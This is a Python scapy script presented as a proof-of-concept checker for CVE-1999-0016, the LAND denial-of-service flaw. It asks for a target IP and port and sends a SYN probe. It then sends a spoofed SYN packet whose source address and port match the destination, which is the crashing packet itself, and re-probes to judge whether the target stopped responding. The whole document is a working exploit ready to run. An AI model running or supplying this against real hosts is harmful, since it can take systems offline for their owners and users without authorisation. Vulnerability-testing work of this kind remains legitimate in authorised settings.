CVE-1999-0016
This is a proof-of-concept (POC) tool, written in Python, that can be used to establish whether or not a target is vulnerable to CVE-1999-0016.
from scapy.layers.inet import *
from scapy.all import *
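# Holds target IP-address (read once at import time; scapy receives it as-is).
ip = input("Please enter the targets IP-address (IPv4): ")
# Destination port as an int. Non-numeric text still raises ValueError from
# int() as before; a value outside the 16-bit TCP port range is now rejected
# here with a clear message instead of failing later when scapy builds the
# packet.
port = int(input("Please enter the port you wish to target: "))
if not 0 <= port <= 65535:
    raise ValueError(f"port must be between 0 and 65535, got {port}")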
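def probe() -> bool:
    """Return True if the target answers a single TCP SYN sent to ``port``.

    Reads the module-level ``ip`` and ``port``. ``sr1`` waits up to 10 s
    for one matching reply; True only means some reply arrived in time,
    it does not by itself mean the port is open.
    """
    # Named ``reply`` rather than ``probe`` so the local no longer shadows
    # this function's own name inside its body.
    reply = sr1(IP(dst=ip) / TCP(dport=port, flags='S'), timeout=10)
    # Same truth test as the original if/else branch, written directly.
    return bool(reply)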
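def main() -> None:
    """Run the CVE-1999-0016 check against the module-level ``ip``/``port``.

    Steps: confirm the host answers a plain SYN, send one packet whose
    source address/port equal its destination (the condition the CVE
    describes), then re-probe the port. The verdict is heuristic: no reply
    on the re-probe is reported as vulnerable, but the same silence can be
    caused by rate limiting or filtering, so a positive result should be
    confirmed by other means rather than taken as proof.
    """
    print("Checking if target is online and responding..")
    if not probe():
        print("Exiting.. Contact couldn't be established.")
        return
    # The reply to this send was never inspected by the original code either;
    # only the follow-up probe below decides the result.
    sr1(IP(src=ip, dst=ip) / TCP(sport=port, dport=port, flags='S'), timeout=1)
    print("Probing port..")
    # Re-probe with a normal SYN. No reply within 5 s is treated as the port
    # having stopped answering (see the caveat in the docstring).
    reply = sr1(IP(dst=ip) / TCP(dport=port, flags='S'), timeout=5)
    if not reply:
        print("Target is vulnerable.")
        return
    # A reply without a TCP layer (sr1 may hand back e.g. an ICMP error in
    # place of a TCP segment) used to raise IndexError on ``reply[TCP]``;
    # report it as inconclusive instead of crashing.
    if not reply.haslayer(TCP):
        print("Reply carried no TCP layer; result is inconclusive.")
        return
    flag = str(reply[TCP].flags)
    if flag == "SA":
        print("Target isn't vulnerable on this port because port is still open.")
        print("Recieved flag: " + flag)
        return
    # Any other TCP flag combination (RST, for example) is read as the port
    # having closed after the spoofed packet, so the target is reported as
    # vulnerable.
    print("Target is vulnerable.")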
if __name__ == "__main__":
    # Only run the check when executed as a script. Note that importing the
    # module still triggers the input() prompts above, since those are
    # module-level statements.
    main()